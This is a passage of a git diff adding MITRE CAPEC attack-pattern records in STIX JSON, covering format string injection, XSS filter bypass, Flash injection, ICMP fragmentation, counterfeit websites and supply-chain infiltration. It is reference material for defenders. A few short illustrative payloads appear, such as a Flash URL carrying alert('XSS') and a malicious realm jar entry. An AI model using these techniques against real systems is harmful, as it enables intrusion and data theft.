developed and delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/447.html", + "external_id": "CAPEC-447" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.", + "Ability to forge web communications to deliver modified design documentation." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d7831c66-164b-4ded-ad02-c8b5a5cd059f.json b/capec/attack-pattern/attack-pattern--d7831c66-164b-4ded-ad02-c8b5a5cd059f.json new file mode 100644 index 0000000000..2c53da50d7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d7831c66-164b-4ded-ad02-c8b5a5cd059f.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--275d36c6-cf6b-4b40-a3a3-5610a121fb4b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d7831c66-164b-4ded-ad02-c8b5a5cd059f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Perception of Concession", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate pattern.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/419.html", + "external_id": "CAPEC-419" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d7f7daa0-0ea6-48f4-968c-b8e92c62f15a.json b/capec/attack-pattern/attack-pattern--d7f7daa0-0ea6-48f4-968c-b8e92c62f15a.json new file mode 100644 index 0000000000..81e79d2745 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d7f7daa0-0ea6-48f4-968c-b8e92c62f15a.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--abb85304-4a33-4b49-ab93-bd250fbe989b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d7f7daa0-0ea6-48f4-968c-b8e92c62f15a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Replace File Extension Handlers", + "description": "When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/556.html", + "external_id": "CAPEC-556" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d.json b/capec/attack-pattern/attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d.json new file mode 100644 index 0000000000..2338d048bf --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--8557c4e7-a676-4042-89dd-296419fbdf8c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Format String Injection", + "description": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/135.html", + "external_id": "CAPEC-135" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html", + "external_id": "CWE-134" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/133.html", + "external_id": "CWE-133" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Hal Burch, Brendan Saulsbury, FIO30-C. Exclude user input from format strings, 2011--05, CERT", + "url": "https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings", + "external_id": "REF-14" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robert Auger, WASC Threat Classification 2.0, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Format-String", + "external_id": "REF-15" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Fortify, The OWASP Application Security Desk Reference, 2010, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/Format_String", + "external_id": "REF-16" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \"../po\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d8d1a4fd-dd67-42ee-a274-9f7c4064283e.json b/capec/attack-pattern/attack-pattern--d8d1a4fd-dd67-42ee-a274-9f7c4064283e.json new file mode 100644 index 0000000000..42e96afde5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d8d1a4fd-dd67-42ee-a274-9f7c4064283e.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--fc62d50b-7732-4fec-8dfb-b071235f9fb2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d8d1a4fd-dd67-42ee-a274-9f7c4064283e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html", + "external_id": "CAPEC-208" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd.json b/capec/attack-pattern/attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd.json new file mode 100644 index 0000000000..2866eb6f70 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--ab8b7b39-64cc-4a90-bb1e-98aebe59ad73", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "XSS Using Invalid Characters", + "description": "An adversary inserts invalid characters in identifiers to bypass application filtering of input. Filters may not scan beyond invalid characters but during later stages of processing content that follows these invalid characters may still be processed. This allows the attacker to sneak prohibited commands past filters and perform normally prohibited operations. Invalid characters may include null, carriage return, line feed or tab in an identifier. Successful bypassing of the filter can result in a XSS attack, resulting in the disclosure of web cookies or possibly other results.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/247.html", + "external_id": "CAPEC-247" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html", + "external_id": "CWE-86" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target must fail to remove invalid characters from input and fail to adequately scan beyond these characters." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d9e8064a-a469-49f6-a656-5c344fd61f7b.json b/capec/attack-pattern/attack-pattern--d9e8064a-a469-49f6-a656-5c344fd61f7b.json new file mode 100644 index 0000000000..a72b288320 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d9e8064a-a469-49f6-a656-5c344fd61f7b.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6232ef76-5121-42fc-8eb5-e966a86303b9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d9e8064a-a469-49f6-a656-5c344fd61f7b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit Websites", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html", + "external_id": "CAPEC-543" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--da7e08a5-0e7a-43a3-b7b9-91a977e96453.json b/capec/attack-pattern/attack-pattern--da7e08a5-0e7a-43a3-b7b9-91a977e96453.json new file mode 100644 index 0000000000..f2b56a9588 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--da7e08a5-0e7a-43a3-b7b9-91a977e96453.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--48a5e19e-0dd3-4f3c-9c64-1117b9973a4b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--da7e08a5-0e7a-43a3-b7b9-91a977e96453", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html", + "external_id": "CAPEC-496" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html", + "external_id": "CWE-404" + }, + { + "source_name": "reference_from_CAPEC", + "description": "ICMP Attacks Illustrated", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats", + "external_id": "REF-425" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--da89b021-dcf2-4901-9584-c264140320ae.json b/capec/attack-pattern/attack-pattern--da89b021-dcf2-4901-9584-c264140320ae.json new file mode 100644 index 0000000000..e0dc273e0c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--da89b021-dcf2-4901-9584-c264140320ae.json @@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--e3eecb6c-c0e2-461f-aa6d-98f09f452be6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html", + "external_id": "CAPEC-75" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html", + "external_id": "CWE-349" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html", + "external_id": "CWE-99" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html", + "external_id": "CWE-353" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html", + "external_id": "CWE-354" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dbb88eed-046e-4b86-a844-4ab0f9ef21c1.json b/capec/attack-pattern/attack-pattern--dbb88eed-046e-4b86-a844-4ab0f9ef21c1.json new file mode 100644 index 0000000000..f28596afce --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dbb88eed-046e-4b86-a844-4ab0f9ef21c1.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--8a46d16d-852c-4d7c-a4b5-a74ecaecb623", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dbb88eed-046e-4b86-a844-4ab0f9ef21c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Inter-component Protocol Manipulation", + "description": "Inter-component protocols are used to communicate between different software and hardware modules within a single computer. Common examples are: interrupt signals and data pipes. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/276.html", + "external_id": "CAPEC-276" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dbe1fe9c-02c4-48cc-b336-1d9cfdb5e5b8.json b/capec/attack-pattern/attack-pattern--dbe1fe9c-02c4-48cc-b336-1d9cfdb5e5b8.json new file mode 100644 index 0000000000..b1705a708a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dbe1fe9c-02c4-48cc-b336-1d9cfdb5e5b8.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--90f8b1ae-1aa4-450e-aff7-70e7c1012538", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dbe1fe9c-02c4-48cc-b336-1d9cfdb5e5b8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "IP (DF) 'Don't Fragment Bit' Echoing Probe", + "description": "This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'DF' (Don't Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the 'DF' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/319.html", + "external_id": "CAPEC-319" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a.json b/capec/attack-pattern/attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a.json new file mode 100644 index 0000000000..98b6aa38ba --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--6a1e3693-2a5a-471a-9b90-4a0c77775cdc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Exploit Test APIs", + "description": "An attacker exploits a sample, demonstration, or test API that is insecure by default and should not be resident on production systems. Some applications include APIs that are intended to allow an administrator to test and refine their domain. These APIs should usually be disabled once a system enters a production environment. Testing APIs may expose a great deal of diagnostic information intended to aid an administrator, but which can also be used by an attacker to further refine their attack. Moreover, testing APIs may not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may have many flaws and vulnerabilities that would allow an attacker to severely disrupt a target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/121.html", + "external_id": "CAPEC-121" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html", + "external_id": "CWE-489" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must have installed test APIs and failed to secure or remove them when brought into a production environment." + ], + "x_capec_resources_required": [ + "For some APIs, the attacker will need that appropriate client application that interfaces with the API. Other APIs can be executed using simple tools, such as web browsers or console windows. In some cases, an attacker may need to be able to authenticate to the target before it can access the vulnerable APIs." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e.json b/capec/attack-pattern/attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e.json new file mode 100644 index 0000000000..e1200d9e8f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e.json @@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--914e2a0f-b54d-4adc-9f19-7558105d4e33", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Flash Injection", + "description": "An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/182.html", + "external_id": "CAPEC-182" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stefano Di Paola, Finding Vulnerabilities in Flash Applications, OWASP Appsec 2007, 2007--11---15", + "external_id": "REF-46" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Rudra K. Sinha Roy, A Lazy Pen Tester's Guide to Testing Flash Applications, iViz", + "url": "http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/", + "external_id": "REF-47" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Peleus Uhley, Creating More Secure SWF Web Application, Adobe Systems Incorporated", + "url": "http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html", + "external_id": "REF-48" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n In the following example, the SWF file contains\n getURL('javascript:SomeFunc(\"someValue\")','','GET')\n A request like\n http://example.com/noundef.swf?a=0:0;alert('XSS')\n becomes\n javascript:SomeFunc(\"someValue\")?a=0:0;alert(123)\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The attacker may need to be able to serve the injected Flash content." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of Flash, especially how to insert content the executes commands." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dd500c80-274c-4438-9cce-50d96a9bca0c.json b/capec/attack-pattern/attack-pattern--dd500c80-274c-4438-9cce-50d96a9bca0c.json new file mode 100644 index 0000000000..5c3ef752dc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dd500c80-274c-4438-9cce-50d96a9bca0c.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b6071a99-5752-4021-be60-e1a0cb62d2c9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dd500c80-274c-4438-9cce-50d96a9bca0c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Infiltration of Software Development Environment", + "description": "An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/511.html", + "external_id": "CAPEC-511" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + 